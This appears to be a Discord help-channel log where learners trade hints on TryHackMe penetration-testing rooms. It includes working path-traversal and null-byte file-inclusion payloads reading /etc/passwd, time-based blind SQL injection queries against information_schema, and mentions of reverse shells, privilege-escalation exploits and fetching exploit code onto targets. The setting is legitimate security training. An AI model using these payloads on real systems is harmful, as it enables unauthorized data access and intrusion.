So did you check the hint? The URI is what the browser requests. Check address bar of your browser (which will show it url encoded) or check the dev tools - > network tab to see what URI gets requested.

The URL I'm seeing in Lab1 : http://10.10.198.124/lab1.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd

I did not check the network tab in the developer tools. I will check there now..

Thanks

i have logged in using rdp in the machine

but, how to do enumeration as the search bar which is seen in windows is not available to open cmd

https://tryhackme.com/room/winprivesc task2

hit the start button and just start typing.

i am in

thanks

i am inside the machine it's saying to list users and it's also saying that one of user contains a flag

i don't have permission for admin and administrator

i have checked jack and user, i didn't find a flag

sorry i checked Public and user

jack also has access denied

booting my vm to take a look

sure!

List users on the target system. One of them resembles a flag.

this is the question

ah. well the task gives a bunch of commands for enumeration. have you tried any of those to list users?

net users

will list the users on that machine

which should show up the flag, or else i need to dig further in any of the user

which i did for user <-- the only one which i have access too @woven perch

wait

i booted wrong machine

Yea, one thing to note is normally if the task goes over some commands or specific task, that is probably what you need to do to get the flags or something adjacent to what the task talked about. At least that is how I have approached tasks. If you start doing other stuff you end up going down some rabbit holes.

extremely sorry

i booted machine of task5 which is similar

No need to be sorry, I have done that as well haha.

Glad you got it figured out

👍

thanx @woven perch

You are welcome

clear

I was trying to do the ohsint room but been stuck on "ssid of the wap" question for about half an hour. I have the bssid and used wigle.net to find the city but have no idea what to do next. Can someone give me a hint

https://tryhackme.com/room/ohsint

oh did not do such a thing, lemme figure it out a little bit more 🙂 thanks

Thank you @glass eagle

Gave +1 Rep to @glass eagle

Thank you for your assistance! Nudging me towards the right tool / methodology was just what I needed to figure this out. After checking the network tab in the developer tools I was able to formulate the right answer.

Gave +1 Rep to @left thunder

'LinPrivEscNFS' -> task 11... I can't run mounted nfs file in target machine (||I made a 'mount' to attackbox... I wrote C++ file priv. esc. I ran it on my attackbox, I got root shell, but I can't go in that same mount folder in target machine and run the c++ code.'||) Any tricks?

Looking for help with File Inclusion Task 5 Question 1 about Lab 3

Give Lab #3 a try to read /etc/passwd. What is the request look like?

I input my request which succeed in getting the passwd
/lab3.php?file=include("languages../../../../etc/passwd%00
and it is incorrect. I don't understand what the question is asking for if not that.

you forgot an / between languages and .../

Are you still looking for help?

Well your LFI seems to be more complicated then it has to be, therefore the answer don't work

Btw that request is not even working, I just tried it.

What did you try so far?

Think about how you could read certain files with base64 SUID

lol no reason to feel stupid

Gave +1 Rep to @woven perch

np

Thanks I figured that might be it. I know what area to work in.

Gave +1 Rep to @left thunder

https://tryhackme.com/room/winprivesc task6 how to tranfser the executablefile to windows ? as wget is not working

should works, what is the error message? Do you have an SimpleHTTPServer on your AttackVM?

i got it done, but i am stuck at this question

What would be the name of the executable you would place in that folder?

the prog looking for an .exe in all the paths!

and if you for example didn't say "Program Files" but Program Files, then the prog will look for Program.exe --nothing there ok , Files.exe ... and so on

hi everyone , can anyone help me in FILE INCLUSION ROOM OF TRYHACKME
I am getting problem in last challenge of that room

which part specifically?

Hey guys, did somone finished the room: FileInclusionVM. From the Jr Pentester Path?

Yes

I'm really stuck at Task 8 Flag 2 & 3 😩

they dont depend on each other, so you can do them in either order

Yeah that is what I did, I tried 2... I was stuck and tried 3th afterwards... but didn't understand both

1. change the values multiple times. understand what you do and what the webpage does

you can't assume it will do what you want. pay attention. i like to use a long random word like so it's obvious

for 3, think if there are otherways to GET the information you want

Look also at the hints and take a break away from the computer, it helps to get a fresh look at a problem

You are so lovely mate thnx I understand it the 2nd flag 🙂 and I found it

now let's go for third

[ROOM COMPLETED]Howdy, anyone in here completed the "Retro" room by dark? I'm on the box as "iusr" via a webshell->powershell revshell, but I'm pretty sure I'm stuck at this point. I'm not one to usually ask for help, but I think I'm missing something lol. Can't seem to be able to find any dir's that "iusr" has perms to write to, and I can't read any normal users home dirs. Was trying to move forward in my privesc here but I can't even get a directory where I could write any files to lol. Was going to download winPEAS via Invoke-WebRequest, and my local server gets a hit as 200-OK but the files are not on the target lol. Also noticed that SeImpersonatePriveledge is enabled on the box so I'm pretty sure I can just run PrintSpoofer on there and get nt/authority system but again, I can't write to any directories that I know of. I'm probably missing something stupid. Any hits?

This is where I'm at lol.

[SOLVED]Hey everyone, new to tryhackme…trying to finish up the exploiting smb portion of the networkservices room. I am stuck at the last part. I have the id_rsa tile and changed the permissions. Now it says to work out the username, then use the service and key to connect to the server. All I get is connection closed by the server messages. Does this mean I’m doing something wrong, or just haven’t figured out the right username yet?

So, when I originally tried to log in as Wade it didn't work for some reason, but after messing with it again I got it to work. So I'm assuming that the revshell method was supposed to be a dead end; or I just couldn't figure it out. But I'm here now; lets see if we can finish this off. 🙂

Are you trying to connect from the attackbox to the target or from your own machine?

From the attackbox

What's the full command you are trying to ssh into the machine? Also make sure you are using the correct IP

bro I have headache because of this 3th flag - fileinclusionVM

have you gotten passed the filter?

I tried the POST method and it doesn't filter anything

yes POST

Using:
ssh -i ~/id_rsa user@targetip

okay. use a long random word to see if it's changing what you expect.

With POST method you can bypass filters, but then still I got stuck bro :/

What's under "title" next to where the target machines IP is displayed?

All I get back is “connection closed by …”

Polosmb3

right. so when you change your request, see what it actually looks up.

Could you send me a screenshot of that in a DM?

Sure

and if you receieve a new error doesn't mean you failed. it could be progress

Yeah I saw the error, it search a default php folder with our input like: {myinput}.php

should I actually just bypass that php?

okay. so you need to terminate the rest of the line

remember in task5, you had to so work with the nullbute

anthing yet?

I tried %00 and /. still not working

I don't know if I just skipped something else

ayo

got it

Still not working

Oh I found it @glass eagle xD

it was just a stupid typing error

There you go. Devil's in the details

hahahaah Thnx bro

Thank you @glass eagle

Gave +1 Rep to @glass eagle

Thank you @woven perch

for helping in dm

I am doing file inclusion room of junion Penetration path

can anyone help me to solve challenge3

I am trying to figure out from last few hours but stuck here

Have you followed the hints for that challenge?

yes

I checked the hint but was not able to understand it completely

can you provide some hints

I tried numbers and symbols

and encoding

nothing worked

and I am also trying to figure out what's the purpose of cookie THM=Guest

in this challenge

I don't remember challenge 3 having a cookie as a part of it. Are you in the correct challenge?

yes I am in correct challenge

I just went to challenge three and it does not have a cookie.

Anyways for challenge 3 you should lookup $_REQUEST and the types of input it can take. You can't always GET what you want.

input mechanisms is probably better wording

I'm doing Task 3 (Brute Force) on the Authentication Bypass for the Jr Penetration Tester path and can't get any results, I'm using the file generated in task 2 (it's populated with the names) and verified I'm properly typing the command. Could anyone point me to anything I may be missing please?

1 sec. let me look at my notes

when looking at your valid_usernames. did you keep the entire output of the previous command, or make a list of ONLY the usernames?

I trimmed it down to only the usernames

do you get an errof rom ffuf?

i just loaded up the VM and ran it myself

did you verify the location of the password file? it wasn't where the example command expected

?

This is the only output I got ":: Progress: [100/100] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::"
I did verify the path to the file was correct.

send me a screen of your commanto result

what room?

nmap basic port scan but i fix it

thanks

you need to specify the wordlist for W1

type /usr/share/seclists/Usernames/names.txt

the 3 name do need to be in the valid_usernames.txt (which you got from the previous task)

you dont need the 10mil. use best 1050. will be faster

yes dont use 10 mil bcs u gonna wait so much

sec

use the best1050.txt file

best1050 yields the same output

@barren bramble maybe cat your valid_usernames.txt and post the output, the rest seems to look like it should

well, screenshot 🙂

Thanks @glass eagle for the DM help, got it to work now after rebuilding the valid_users file.

explaining the -s option for ffuf would really benefit that room i think 😉

Gave +1 Rep to @glass eagle

user@AttackBox$ traceroute tryhackme.com
traceroute to tryhackme.com (172.67.69.208), 30 hops max, 60 byte packets
1 ec2-3-248-240-5.eu-west-1.compute.amazonaws.com (3.248.240.5) 2.663 ms * ec2-3-248-240-13.eu-west-1.compute.amazonaws.com (3.248.240.13) 7.468 ms
2 100.66.8.86 (100.66.8.86) 43.231 ms 100.65.21.64 (100.65.21.64) 18.886 ms 100.65.22.160 (100.65.22.160) 14.556 ms
3 * 100.66.16.176 (100.66.16.176) 8.006 ms *
4 100.66.11.34 (100.66.11.34) 17.401 ms 100.66.10.14 (100.66.10.14) 23.614 ms 100.66.19.236 (100.66.19.236) 17.524 ms
5 100.66.7.35 (100.66.7.35) 12.808 ms 100.66.6.109 (100.66.6.109) 14.791 ms *
6 100.65.14.131 (100.65.14.131) 1.026 ms 100.66.5.189 (100.66.5.189) 19.246 ms 100.66.5.243 (100.66.5.243) 19.805 ms
7 100.65.13.143 (100.65.13.143) 14.254 ms 100.95.18.131 (100.95.18.131) 0.944 ms 100.95.18.129 (100.95.18.129) 0.778 ms
8 100.95.2.143 (100.95.2.143) 0.680 ms 100.100.4.46 (100.100.4.46) 1.392 ms 100.95.18.143 (100.95.18.143) 0.878 ms
9 100.100.20.76 (100.100.20.76) 7.819 ms 100.92.11.36 (100.92.11.36) 18.669 ms 100.100.20.26 (100.100.20.26) 0.842 ms
10 100.92.11.112 (100.92.11.112) 17.852 ms * 100.92.11.158 (100.92.11.158) 16.687 ms
11 100.92.211.82 (100.92.211.82) 19.713 ms 100.92.0.126 (100.92.0.126) 18.603 ms 52.93.112.182 (52.93.112.182) 17.738 ms
12 99.83.69.207 (99.83.69.207) 17.603 ms 15.827 ms 17.351 ms
13 100.92.9.83 (100.92.9.83) 17.894 ms 100.92.79.136 (100.92.79.136) 21.250 ms 100.92.9.118 (100.92.9.118) 18.166 ms
14 172.67.69.208 (172.67.69.208) 17.976 ms 16.945 ms 100.92.9.3 (100.92.9.3) 17.709 ms
what is the IP address of the last router/hop before reaching tryhackme.com?
What would be the answer?
In my knowledge, It should be 100.92.9.118
But that's not right answer
can anyone tell me the answer with reason?

SQL Injection Task 8 blind SQli referrer=admin123' UNION SELECT SLEEP(5),2 where database() like 'u%';-- gives no response. I read the other task 8 posts. Any other hints?

The 'u%' is just a reminder of what you should be doing, not the first thing to try

"u" should be replaced by something similar you found in task 3

You did the task 8 ?

Yes, it takes time but you'll get there!

i found some table names

that's it x)

task 5 gave me a hint of what the database name is. When I put it in it takes 5.001 seconds but doesn't return anything. I manage two SQL servers with 30+ databases and am used to writing select script. Other than changing u do I need to modify any other part of it. the referrer script doesn't return tables. I looked at task 3 and tried many SQL scripts to retrieve tables and get errors. This is the last task I need to complete.

In the gatekeeper room , the script firefox_decrypt just doesn't work. I tried my best, but can't get it to work. Any ideas or workarounds?

So you are at task 8, right? If yes, you are not supposed to get anything back except for a true or false which is indicated by the 5 seconds delay. delay = true, no delay = false

That's normal that it does not return anything. The fact that it sleep for 5s means that you have something working

I realize that but I get no response. I went on to the rest of the Jr. Pentest sections. Seems like some sections are written better than others.

Well yeah you need to reallt spend a lot of time on SQL

I have two SQL servers and 30+ databases at work I write scripts for. I have Mariadb on my servers at home I write databases on.

Yeah but it's still specific

Complete Beginner path, need help with Network Services module Task 4, the very last question, figuring out the password? I've been stuck on this for awhile now. I think I skipped a room where we learn to decrypt rsa_id or something. Thanks

you dont need to decrypt the file. copy the file to your machine and use it with ssh.
ssh -i <keyfile>

also don't forget to chmod 600 it

I did that, and the chmod 600. Then it appears clear, and I go to log in with ssh and I get keep getting asked for a password and don't know how I'd get the password (that's why I thought it had to be decrypted) OK wait no tried a different command and got logged in correctly, so thx for the tiny hint!

Hey guys, I am on the linux privesc task(jr pentester) where I gain root shell access on a reverse shell through a cronjob. However, once the script executes and I get a connection on the reverse shell(attacking machine), it connects as the unprivileged user(karen) instead of root. can you help me out as to why this happens

i just ran that task again. set the correct permissions (600) and owner (root.root) on the id_rsa. then you can ssh -i <id_rsa_file> and login with the correct username

if you use the correct username with the file, it should work. you can make guesses from the information you know. but the id_rsa.pub is typically signed to user@server. so check that file

I got it, thanks so much, my sticking point was being unfamiliar with the -i switch with ssh, noted now!

Gave +1 Rep to @glass eagle

Some rooms i do in 20 minutes. Ones like this one item takes hours. The idea is to learn the material not go on a scavenger hunt. The material should be concise to how to complete tasks

can I get in on this?
Here's what my valid_usernames.txt looks like

and I've tried the best1050.txt password list.. Still getting:
this output with these errors. what am I doing wrong?

Your file is not right, it has to be 1 username per line without anything else, in your case without the status code, size etc.

I thought I tried that last night (late). Maybe I didn't save. I'll try again. Thx.

is the cronjob being run by karen or by root? That's strange 🤔

to post screenshots and all that shebang, you need to verify btw :P

!docs verify

Next time use dirbuster.py python file from github

I'm not the room creator if you are not happy about it don't do Cybersec. Some rooms are simple some are not. When you do a pentest you are not always finding things right away

@prime elk @obtuse hill what you need to do here is to accept that as regular murphy user you cannot have read access to the /etc/shadow file,
[-] Post aborted due to failure: no-access: Shadow file must be readable in order to dump hashes
so what you need to do here is to rise your privileges by using command like sudo cat /etc/shadow
the copy & paste previously used ssh password
for linux users this might be so obvious, that someone might to forget mention that 😛 for non linux users

Okay I will try it.

Can I get a hint for command injection task 5

Guys on what path should I run the whoami payload in task5 command injection please 😩

What you mean with "on what path" ?

@left thunder Hi Fontaene,
I just got the first question by running a payload in the diagnoseit machine. 🚩
The second question it asks for the flag in /home/tryhack.me/flag.txt
I don't know how to run a payload on that🤔

So how would you display the flag if you are on your own terminal? Like what command would you use to display the flag?

I would open the attackbox and run curl with a http()whoami@left thunder 🤔

Mh? How would whoami display the flag content? I mean if the flag.txt is on your local machine, what would you enter to get the content of that file printed in your terminal?

@left thunder I think that half a path is confusing me. I would use my local ip or the path

Have you done the linux fundamental rooms?

I have not. I just started the junior pentest straight away. But I'll go there and read

Ye, I don't want to be rude or offending or something, but I think you are missing some linux basics, so giving the linux fund rooms a go would for sure help you on that task.

@left thunder great thankyou 😎 no worries I'm entry level

I appreciate your help. I know you didn't design it. Took 4 hours to work through the blind sqli configuration. Some pages lay out the methods better.

Give +1 Rep to @MadzBlind

Hi everyone, So I am stuck on linux privesc task 11 (NFS)
I see there are 3 mountable shares on the target machine, out of which I cant "cd" into 2 of them. so the only genuine one is /tmp

So I mount the /tmp drive on the attacking machine, create the binary and make it execudable, give it SUID permissions and root ownership. however, these files dont show up on th

For the NetSec Challenges, can you specify what port you want instead of protocol name in Hydra?

trying to re-direct to the non-standard FTP port

I've tried the -S switch but it's not taking it for some reason

ohhhh gotcha

thanks! @burnt rivet

Gave +1 Rep to @burnt rivet

Hey people, I'm trying to complete LFI #2 on inside File Inclusion in the Junior Penetration Tester Course and I accomplished the task, the one thing I can't seem to find is the name of the function in the second question, please help, it is something with 17 characters

It's mentioned in one of the previous tasks

I've tried everything I believe but I'll keep at it

I got it now, I would never reach it

Thanks everyone

guys I am stuck on an authentication bypass task4 for hours any help, please??

Same thing here. I tried to get the binary using a python web server but the file comes owened by karen and when executed only gives user karen a bash shell. I tried mounting on the other shares but still, files are not syncronized

took about an hour to synchronize, in this time I started going back to everything linux priv escalation, LOL. Now that it synchronized, got it to work.

Hi! Is there anyone that can help me with SQL Injection lab from the new Jr Penetration Tester path? I have been stuck for hours

I suggest you ask the question you have straight out, as in case someone can/is willing to help, he will reply and therefore you will get your answer faster then first asking if someone can help 😄

Sure Thanks!

I need help for the SQL Injection Room from the new Jr Penetration Tester Path. I'm stuck at task 8. The room is really buggy, it gives a lot of false positives, that's why I am unable to enumerate columns from the DB

Hello, I need a hint on ccpentsting room Section 7 - Final Exam @ https://tryhackme.com/room/ccpentesting

Using nmap I found out there's a SSH and Apache services running on the machine, using the browser I saw that the apache server is running the default page, scanning with gobuster has discovered a few pages with access denied codes, but there's a /secret folder with code 301 that just leads to a blank page..

What you mean with false positives? What have you tried?

I already used sqlmap cause I went crazy. Time based blind SQL injection from task 4 activates if you put an underscore while enumeration and using sqlmap gave the correct data. Example: I use "UNION SELECT SLEEP(5),2 WHERE database like 'sql_%';" and it triggers the vuln. I spent a lot of time stuck at this with the idea stuck in my head that the DB name started with sql_ and it was wrong.

I can also put 'sql_____________' and still triggers the vuln but if I try any other letter, number or symbol, apart from the underscore, it wont activate

I have the db name and the table name, but it's happening again with the columns

I don't know about sqlmap, but you can do the whole task within the page of the split screen. So I'm not sure what exactly you are stuck on, if you use admin123' UNION SELECT SLEEP(5),2 where database() like 'u%';-- and it's not sleeping 5 seconds, means that the database name doesn't start with u . So if you are going through all the letters and special characters. Like 'a%' , 'b%' and so on, you should be easily able to figure out the database name and so on. Also as far as I remember, there is no database starting with sql so if you try admin123' UNION SELECT SLEEP(5),2 where database() like 's%';-- it shouldn't sleep.

Sorry, I meant level 4 from task 8, the only "challenge" that doesn't explain every step.

I know, but that is the problem, the room is buggy, cause as I said I used sqlmap and I already got the real name of the DB, but when I try the real name with the payload directly on the webpage, it wont trigger, it will only trigger with an underscore

For example, let's imagine that I already know that the name of the DB is 'admin'. If I try and send "admin123' UNION SELECT SLEEP(5),2 where database() like 'admi%';--" it wont trigger. But if I do "admin123' UNION SELECT SLEEP(5),2 where database() like 'adm_%';--" it activates 😦

So could you do me a favour and try without sqlmap on the challange webpage admin123' UNION SELECT SLEEP(5),2 where database() like 's%';-- and let me know if it's going to sleep?

It does, I already extracted the real DB name and the table name that I want to extract, but every time I try to do it manually, it does the same. Like on the DB name, it always did that not vuln trigger with "admin123' UNION SELECT SLEEP(5),2 where database() like 'sql%';--

So I managed to get db and table name, but now the webpage is doing the same with column enumeration and I can't move

Oh hold on I'm stuipd, it actually starts with s xD. So if it's triggering with 'sql_%' it means there is an underscore in it. But as you already figured out the database name, I don't know why you going to try admin123' UNION SELECT SLEEP(5),2 where database() like 'adm_%';-- as that's only going to enumerate another database, instead of trying to enumerate the tables of the sql database you previously found.

Sorry, that was an example so that I wont spoil anything

Let me send the real query that I am using

Ye

admin123' UNION SELECT SLEEP(3),2 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='sqli_*' and TABLE_NAME='use' and column_name like '%';-- -

The asterisk in tableschema is just for spoiler purpose, right?

table name is wrong, grabbed the font change with some * symbols

Yep

sqli_****

use**

And the Table name aswell?

Okay.

Now, if I do admin123' UNION SELECT SLEEP(3),2 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='sqli_' and TABLE_NAME='use' and column_name like '_%';-- - it does trigger, even if I put 100 underscores, but it doesn't work with any other letter or symbol

Okay, I don't know why it's going to trigger with the underscores, I had an issue with underscores while enumerating the database name as well, but, if you keep on adding 'a%';-- , 'b%';-- and so on, you should get a positive response for one of the letters. Not sure if you really also add the - at the very end of your query or if it's just a typo in discord, but if you do, I would get rid of that

And that it's going to trigger with using only '%';-- is alright.

Thanks for the help buddy! I restarted two times the machine and it finally worked, room completed!

Again, thanks for the help

Alright 🙂

Hello all, who can I ask for help, I can not understand how to up privilege, I found the binary itself, but I can not understand how it works, task Blog

Im stuck in the File Inclusion room, Challenge, Question 3.
All fullstops and "/" are filtered, so I have no idea how to get to ../(...)/etc/flag3.
The hints said that I should research $_Requests in PHP, because some things aren't filtered, but for the life of me I can't find any good documentation on it that includes this.
What can I do now?

Combination of filter bypass, which is explained in a previous task and request method. https://www.w3schools.com/tags/ref_httpmethods.asp

I've tried filter bypass with "....//", but that doesn't work. The individual "." and "/" are replaced, so I can't duplicate it that way. As for the request methods: I changed this from GET to POST and now it worked. Thanks a lot! I've read through the differences between GET and POST though, and I don't quite understand how changing this would change the filter. As far as I can remember "/" are part of ascii, right?

Gave +1 Rep to @left thunder

New issue arrose: When trying to circumvent the appended ".php" with a nullbyte, I realized that the nullbyte is just taken into the search. So, the query goes as follows: ".../etc/flag3%00.php". How do I have the nullbyte actually "work"?

Check your "real" request in the network tab of the dev tools for example and see what happens.

Oh man, I did that and then edited my request with burp... sometimes I wonder why I don't think of doing these things. It's getting really annoying because it happens so frequently. Thanks alot though!

Gave +1 Rep to @left thunder

give it time :)

Nobody starts off being great at this stuff ^-^

That is true, but I am "already" 0x8 and still do things like this haha. I end up getting done by looking up writeups sometimes, but there are no writeups for actual bug bounty hunting

I'm also 0x8 and get stuck a lot on things that I feel like I should already know. Looking at write-ups isn't a bad thing at all. You see how other people do things and gives you new ideas. What's important is to try to understand what's going on and why it works :)

That is a good point. I generally already understand what they are doing in the write up, I just don’t think of actually trying it. I’m generally not really stuck because of a lack of knowledge, but I just have no clue what I should try to solve the challenge.

Follow along with what they do in the write-up, learn how it works and then try to do it again but on your own. After doing this a lot (and I know it can be very demoralising), you'll definitely notice an improvement. Just go back to rooms on THM for example that you remember struggling with in the past and you'll see :)

Thats actually a really good idea, I'll do that once I'm back

Thanks for the advice!

Gave +1 Rep to @dry gate

you're very welcome

room Linux privesc - task 5 but not able to transfer exploit to target machine

any one please help

tried scp

wget

curl

getting permission denied

$ wget http://10.10.131.130/37292.c
--2021-10-31 11:09:20-- http://10.10.131.130/37292.c
Connecting to 10.10.131.130:80... connected.
HTTP request sent, awaiting response... 405 Method Not Allowed
2021-10-31 11:09:20 ERROR 405: Method Not Allowed.

$ curl htttp://10.10.131.130/37292.c
-sh: 5: curl: not found

$ wget http://10.10.131.130:4444/37292.c
--2021-10-31 11:25:15-- http://10.10.131.130:4444/37292.c
Connecting to 10.10.131.130:4444... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5119 (5.0K) [text/plain]
37292.c: Permission denied

Cannot write to ‘37292.c’ (Permission denied).
$

Retry in /tmp folder maybe

make sure you get the file to a folder you have write permissions. Try to touch anyfile to test write permissions. Also a good idea to compile code on your kali/attackbox since gcc or python will not always be installed and you may not be able to install them either.

yup

thanks

thanks

Gave +1 Rep to @worthy marten

npnp

not able to connect to target machine
Task 6 Privilege Escalation: Sudo
connection error

you might as well forget about sudo in this and all upcoming tasks in this room. Try the other GTFObins options. Now you have to scratch head harder.

thanks

Gave +1 Rep to @worthy marten

got you

Hey there! I'm stuck on Task 8 in the SQL Injection room. I got the table schema but I've tried everything for the table name, but I am not getting a delay

What's the command you try?

https://website.thm/analytics?referrer=admin123' UNION SELECT SLEEP(5),2 FROM information_schema.tables WHERE table_schema = 'sql' and table_name like '%';--

In the %, I tried inputting every number, char and alphabet

You have not enumerated the correct database name, so therefore this is not going to work.

Oh I see

My bad

Thanks! @left thunder

Gave +1 Rep to @left thunder

Hi, I'm also stuck on Task 8 in the SQL Injection room. I found the first 4 characters of the password but couldn't find the next one.

have you checked if that is the password?

yes

it said incorrect username/password, combination

looking at notes

yeah. mine shows admin with a 4 char password

that has multiple pages that keep progressing to the next challenge, right?

yes

it's Level 4

time based one

and you pulled info from sqli_four, so its not the same pw as the previous task?

yeah, It's not the same password as the previous task

PM me with your un/pw

I got the delay for the fist 4 characters of the password for admin. Tried logging in but didn't work

thanks @glass eagle

Gave +1 Rep to @glass eagle

if anyone finds this message looking for help in the future. the underscore character is NOT in the password. In database syntax _ may be used as a wildcard character. This lead to the confusion here

Smashed my head against the proverbial wall for far too long about this. your tip got me sorted in 5 min. TYVM.

Who is the author of Exploit-DB?
johnny long should be the answer
but it is not
any hints?

https://www.exploit-db.com/history

At the end of the website there's " Exploit Database by [...] " it will be your answer

This is on an attackbox

Doing the Network Services 2 MySQL section

Task 9

if you've already done that. try running it as "/usr/bin/mysql"

I tried that in the screenshot, I'll try what your method

It didn't work.